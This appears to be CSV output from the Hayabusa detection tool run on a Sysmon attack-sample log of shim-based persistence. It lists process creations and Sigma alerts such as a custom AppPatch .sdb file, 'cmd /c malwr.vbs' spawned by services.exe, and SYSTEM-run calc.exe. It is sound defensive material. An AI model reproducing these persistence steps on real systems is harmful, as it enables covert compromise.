2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:58:44.237 +09:00,PC01.example.corp,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.518 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe   :  Path: C:\Windows\System32\wsqmcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:00:01.539 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader""  :  Path: C:\Windows\System32\schtasks.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\System32\wsqmcons.exe ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb  :  Path: C:\Windows\System32\rundll32.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb""  :  Path: C:\Program Files\Windows NT\Accessories\wordpad.exe  :  User: EXAMPLE\user01  :  Parent Command: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\cmd.EXE /c malwr.vbs  :  Path: C:\Windows\System32\cmd.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logoff  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x1  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\servicing\TrustedInstaller.exe  :  Path: C:\Windows\servicing\TrustedInstaller.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000001 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000001 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\lsm.exe  :  Path: C:\Windows\System32\lsm.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe  :  Path: C:\Windows\System32\VBoxService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe  :  Path: C:\Windows\System32\spoolsv.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup  :  Path: C:\Windows\System32\gpscript.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe""  :  Path: C:\Program Files\freeSSHd\FreeSSHDService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe""  :  Path: C:\Windows\System32\taskhost.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe""  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon  :  Path: C:\Windows\System32\gpscript.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe  :  Path: C:\Windows\System32\calc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
